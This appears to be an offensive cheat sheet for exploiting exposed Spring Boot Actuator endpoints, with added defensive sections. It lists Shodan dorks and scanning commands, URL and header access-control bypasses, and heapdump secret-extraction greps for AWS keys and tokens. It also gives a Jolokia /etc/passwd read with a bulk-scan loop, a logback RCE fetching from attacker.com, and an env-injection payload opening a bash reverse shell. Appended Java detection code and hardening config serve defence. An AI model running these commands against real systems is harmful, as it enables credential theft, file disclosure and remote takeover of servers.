Spring Boot Actuator

A hands-on walkthrough to find, test and exploit Spring Boot Actuator endpoints

Phase 1: Discovery - Shodan Dorks

1. Shodan dork - find Spring Boot by favicon hash
org:target_org http.favicon.hash:116323821
2. Shodan dork - SSL certificate + favicon
ssl:"example.com" http.favicon.hash:116323821
3. Shodan dork - wildcard cert + favicon
ssl.cert.subject.CN:"*.example.com" http.favicon.hash:116323821
4. Shodan dork - hostname + favicon
hostname:"example.com" http.favicon.hash:116323821
5. Shodan dork - exact cert + favicon
ssl.cert.subject.CN:"example.com" http.favicon.hash:116323821

Phase 1: Discovery - Nuclei Scanner

1. Nuclei scan - actuator templates
cat act.txt | nuclei -tags actuator -c 50
2. Nuclei scan - jolokia templates
cat act.txt | nuclei -tags jolokia -es info,low -silent

Phase 1: Discovery - Dirsearch

1. Dirsearch with Spring Boot wordlist
dirsearch -l target.txt -w /Seclist/Discovery/Web-Content/spring-boot.txt -x 404 -o output.txt

Phase 1: Discovery - Httpx Probe

1. Httpx probe for common actuator paths
cat targets.txt | httpx-toolkit -silent -threads 50 -path '/actuator,/actuator/health,/actuator/info' -mc 200,401,403,302 > actuators.txt

Phase 2: Key Actuator Endpoints

1. Actuator root - base endpoint
http://ipaddr/actuator
2. Health - application health status
http://ipaddr/actuator/health
3. Info - application info
http://ipaddr/actuator/info
4. ENV - environment variables (HIGH RISK)
http://ipaddr/actuator/env
5. Configprops - configuration properties
http://ipaddr/actuator/configprops
6. Beans - Spring beans list
http://ipaddr/actuator/beans
7. Mappings - request mappings
http://ipaddr/actuator/mappings
8. Metrics - application metrics
http://ipaddr/actuator/metrics
9. Loggers - logging configuration
http://ipaddr/actuator/loggers
10. Threaddump - thread dump
http://ipaddr/actuator/threaddump
11. Heapdump - memory dump (CRITICAL)
http://ipaddr/actuator/heapdump
12. Jolokia - JMX bridge (CRITICAL)
http://ipaddr/actuator/jolokia
13. Hawtio - management console
http://ipaddr/actuator/hawtio
14. Httptrace - HTTP request trace (HIGH RISK)
http://ipaddr/actuator/httptrace
15. Auditevents - audit events
http://ipaddr/actuator/auditevents
16. Scheduledtasks - scheduled tasks
http://ipaddr/actuator/scheduledtasks
17. Caches - cache management
http://ipaddr/actuator/caches
18. Sessions - HTTP sessions
http://ipaddr/actuator/sessions
19. Shutdown - graceful shutdown
http://ipaddr/actuator/shutdown
20. Prometheus - metrics endpoint
http://ipaddr/actuator/prometheus
21. Trace - request trace (legacy)
http://ipaddr/actuator/trace
22. Conditions - auto-configuration report
http://ipaddr/actuator/conditions
23. Refresh - refresh application context
http://ipaddr/actuator/refresh
24. Restart - restart application
http://ipaddr/actuator/restart
25. ENV property - specific env variable
http://ipaddr/actuator/env/{property}

Phase 2: Bypass - X-Forwarded-For

1. Bypass with X-Forwarded-For header
curl -H "X-Forwarded-For: 127.0.0.1" http://example.com/actuator/env

Phase 2: Bypass - X-Original-URL

1. Bypass with X-Original-URL header
curl -H "X-Original-URL: /actuator/env" http://example.com/some-allowed-path

Phase 2: Bypass - Semicolon / Matrix Tricks

1. Semicolon path injection
http://example.com/;actuator
2. Double slash bypass
http://example.com/actuator//env
3. Dot suffix bypass
http://example.com/actuator/.

Phase 2: Bypass - Dot-Segment Traversal

1. Dot-segment prefix
http://example.com/./actuator
2. Traversal prefix
http://example.com/../actuator

Phase 2: Bypass - URL Encoding

1. Percent-encoded traversal
http://example.com/%2e%2e/actuator
2. Encoded slash in path
http://example.com/actuator%2Fenv
3. Null byte injection
http://example.com/actuator%00

Phase 2: Bypass - Trailing Dots & Extensions

1. Trailing dot
http://example.com/actuator.
2. Double trailing dot
http://example.com/actuator..
3. JSON extension
http://example.com/actuator.json
4. HTML extension
http://example.com/actuator.html

Phase 2: Bypass - Query/Path Mix

1. Query parameter bypass
http://example.com/actuator?path=env
2. Query param on actuator path
http://example.com/actuator/env?some=param
3. Encoded question mark bypass
http://example.com/actuator%3Fenv

Phase 2: Bypass - HTTP Verb & Headers

1. HEAD verb bypass (use -I; with -X HEAD curl keeps waiting for a body that never arrives)
curl -I http://example.com/actuator/env
2. OPTIONS verb bypass
curl -X OPTIONS http://example.com/actuator/env
3. X-Original-URL header
curl -H "X-Original-URL: /actuator/env" http://example.com/
4. X-Rewrite-URL header
curl -H "X-Rewrite-URL: /actuator/env" http://example.com/
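Every variant in the bypass sections above works on the gap between the raw request path and the path the framework finally routes. The following is an added example, not part of the original cheat sheet, written from the detection side: it canonicalises a request path the way a lenient router would (matrix parameters, double slashes, dot segments, percent-encoding, NUL bytes, trailing dots, .json/.html suffixes) before matching on /actuator, so a log or WAF rule keyed on the raw string is not fooled, and it also catches the header-based variants (X-Original-URL, X-Rewrite-URL, a loopback address claimed in X-Forwarded-For). The class name, the header set and the sample requests are assumptions for illustration. Runs stand-alone with `java ActuatorProbeDetector.java` on JDK 11 or later.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/**
 * Added example (not from the original cheat sheet): canonicalise a request path
 * the way a lenient router would, so that the bypass variants above resolve to
 * the actuator path they actually reach. Class name, header set and sample
 * requests are assumptions for illustration.
 */
public class ActuatorProbeDetector {

    /** Headers a misconfigured proxy may honour as a path override. */
    static final List<String> OVERRIDE_HEADERS = List.of("x-original-url", "x-rewrite-url");

    static String stripQuery(String p) {
        int q = p.indexOf('?');
        return q >= 0 ? p.substring(0, q) : p;
    }

    /** Collapse the path tricks from the bypass sections into one canonical path. */
    static String canonicalize(String rawPath) {
        String p = stripQuery(rawPath);
        // Decode twice so that both %2e%2e and double-encoded %252e end up as ".."
        for (int i = 0; i < 2; i++) {
            try {
                p = URLDecoder.decode(p, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException e) {
                break; // malformed escape sequence: keep what we have so far
            }
        }
        p = stripQuery(p).replace("\0", ""); // %3F became '?', %00 became NUL
        Deque<String> out = new ArrayDeque<>();
        for (String seg : p.split("/+")) {   // "/+" collapses "actuator//env"
            int semi = seg.indexOf(';');
            if (semi >= 0) seg = seg.substring(0, semi);        // matrix parameters
            if (seg.isEmpty() || seg.equals(".")) continue;      // empty or "." segment
            if (seg.equals("..")) { out.pollLast(); continue; }  // traversal segment
            seg = seg.replaceAll("\\.+$", "");                  // "actuator." / "actuator.."
            seg = seg.replaceAll("\\.(json|html)$", "");        // "actuator.json" / ".html"
            if (!seg.isEmpty()) out.addLast(seg.toLowerCase());
        }
        return "/" + String.join("/", out);
    }

    static boolean targetsActuator(String path) {
        String c = canonicalize(path);
        return c.equals("/actuator") || c.startsWith("/actuator/");
    }

    /**
     * Returns why a request should be flagged, or null if it looks benign.
     * The HTTP method is deliberately ignored: HEAD and OPTIONS reach the same
     * handler as GET, so they must not slip past the rule.
     */
    static String classify(String method, String path, Map<String, String> headers) {
        if (targetsActuator(path)) return "actuator path " + canonicalize(path);
        if (path.toLowerCase().contains("actuator")) return "actuator token in raw path"; // e.g. "/;actuator"
        for (String h : OVERRIDE_HEADERS) {
            String v = headers.get(h);
            if (v != null && targetsActuator(v)) return "actuator via " + h + " header";
        }
        String xff = headers.get("x-forwarded-for");
        if (xff != null && xff.trim().startsWith("127.")) return "loopback address claimed in X-Forwarded-For";
        return null;
    }

    public static void main(String[] args) {
        // Constructed sample requests: {method, path, optional "header:value"}
        String[][] samples = {
            {"GET", "/;actuator"},
            {"GET", "/actuator//env"},
            {"GET", "/%2e%2e/actuator"},
            {"GET", "/actuator%2Fenv"},
            {"HEAD", "/actuator.."},
            {"GET", "/actuator.json"},
            {"GET", "/actuator?path=env"},
            {"GET", "/some-allowed-path", "x-original-url:/actuator/env"},
            {"GET", "/actuator/env", "x-forwarded-for:127.0.0.1"},
            {"GET", "/api/orders"},
        };
        for (String[] s : samples) {
            Map<String, String> headers = new HashMap<>();
            for (int i = 2; i < s.length; i++) {
                String[] kv = s[i].split(":", 2);
                headers.put(kv[0].toLowerCase(), kv[1]);
            }
            String reason = classify(s[0], s[1], headers);
            System.out.printf("%-5s %-32s %s%n", s[0], s[1], reason == null ? "ok" : "FLAG: " + reason);
        }
    }
}
```

Every constructed request except /api/orders is flagged. The raw-token check is deliberately over-inclusive: a path like /;actuator may route to / after matrix-parameter stripping, but the string itself is a probe worth logging. The real fix is not to match paths at a proxy at all but to make the endpoints unreachable in the application, which is what the mitigation section covers.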

Phase 3: Heapdump - AWS Key Extraction

1. Download heapdump
wget http://target.com/actuator/heapdump
2. Extract AWS Access Keys from heapdump
strings heapdump | grep -B 2 -A 2 "AKIA"
3. Extract all AWS Key IDs
strings -a -n 6 heapdump | grep -Eo 'AKIA[0-9A-Z]{16}' | sort -u > aws_keys.txt

Phase 3: Heapdump - Token Extraction

1. Extract JWT tokens from heapdump
strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+' | sort -u > jwt_candidates.txt
2. Extract long alphanumeric tokens (API keys)
strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9_\-]{20,}' | sort -u > long_token_candidates.txt
3. Extract all possible secrets from heapdump (same file downloaded in the previous section)
strings -a -n 6 heapdump | grep -Ei 'password|passwd|pwd|secret|api[_-]?key|token|auth|authorization|bearer|aws|AKIA|ssh-rsa' -n > possible_secrets.txt

Phase 3: Jolokia - Local File Inclusion (LFI)

1. Jolokia LFI - read /etc/passwd
curl "http://domain.com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"

Phase 3: Jolokia - LFI Bash Script

1. Bulk LFI check script
while read ip; do response=$(curl -s -m 10 "http://$ip/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"); if echo "$response" | grep -q "root:"; then echo "VULNERABLE: $ip"; echo "$response" > "vulnerable_$ip.txt"; fi; done < ip_list.txt

Phase 3: Jolokia - RCE via logback

1. Jolokia RCE - load malicious logback.xml
curl "http://domain.com/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/attacker.com!/logback.xml"

Phase 3: Jolokia - Reverse Shell via HikariCP

1. HikariCP env injection - reverse shell
curl -X POST "http://ip/actuator/env" -H "Content-Type: application/json" -d '{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS '\''String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(new String[]{\"/bin/sh\", \"-c\", cmd}); return \"done\"; }'\''; CALL EXEC('\''bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'\'');"}'

Automation Tools

1. SpringBootFinder - discover Spring Boot instances
https://github.com/xiaoliangli1128/SpringBootFinder
2. S4S-Scanner - Spring Boot security scanner
https://github.com/onurgule/S4S-Scanner

Mitigation & Prevention

1. Mitigation #1 - firewall + internal network only
Never expose actuator endpoints to the public internet
2. Mitigation #2 - protect all actuator endpoints
Use Spring Security with authentication/authorization
3. Mitigation #3 - non-default path
Change base path: management.endpoints.web.base-path=/custom-secret-path
4. Mitigation #4 - disable sensitive endpoints
Disable unused endpoints (heapdump, jolokia in production)
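As an added example (not the cheat sheet's own content), here is how the four mitigations above look in a Spring Boot 3 / Spring Security 6 application: a dedicated SecurityFilterChain for the management endpoints, with the matching application.properties entries in the leading comment. The package name, the class name, the ACTUATOR_ADMIN role and the concrete property values are assumptions; the property keys and the EndpointRequest API are Spring Boot's own.

```java
// Added example (not from the original cheat sheet): the four mitigations above
// as Spring Boot 3 / Spring Security 6 configuration. Package, class and role
// names are illustrative. The matching application.properties (assumed values):
//
//   # Mitigation 1: management traffic on its own port, bound to an internal
//   # interface (loopback shown as the most restrictive choice) and firewalled
//   management.server.port=8081
//   management.server.address=127.0.0.1
//   # Mitigation 3: non-default base path (a secret path is not authentication)
//   management.endpoints.web.base-path=/custom-secret-path
//   # Mitigation 4: allowlist instead of "*"; heapdump, jolokia, env and shutdown
//   # are never mapped, so no path trick can reach them
//   management.endpoints.web.exposure.include=health,info,metrics,prometheus
//   management.endpoint.heapdump.enabled=false
//   management.endpoint.shutdown.enabled=false
//   management.endpoint.env.show-values=never
//   management.endpoint.health.show-details=when-authorized
package com.example.hardening;

import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest;
import org.springframework.boot.actuate.health.HealthEndpoint;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.annotation.Order;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.web.SecurityFilterChain;

@Configuration
public class ActuatorSecurityConfig {

    /**
     * Mitigation 2: a dedicated filter chain, evaluated before the application's
     * own chain, covering every actuator endpoint under whatever base path is
     * configured. Only health is anonymous (load balancers need it; details stay
     * hidden because of show-details=when-authorized); everything else requires
     * the ACTUATOR_ADMIN role over HTTP Basic.
     */
    @Bean
    @Order(1)
    SecurityFilterChain actuatorChain(HttpSecurity http) throws Exception {
        http
            .securityMatcher(EndpointRequest.toAnyEndpoint())
            .authorizeHttpRequests(auth -> auth
                .requestMatchers(EndpointRequest.to(HealthEndpoint.class)).permitAll()
                .anyRequest().hasRole("ACTUATOR_ADMIN"))
            .httpBasic(Customizer.withDefaults());
        return http.build();
    }
}
```

EndpointRequest.toAnyEndpoint() resolves the configured base path itself, so mitigation 3 does not break the matcher, and because it is evaluated on the path Spring actually routes rather than on the raw URL, the encoding and dot-segment variants listed earlier do not slip past it. The exposure allowlist is the stronger control: an endpoint that is not included is not registered at all, which no request rewriting can undo.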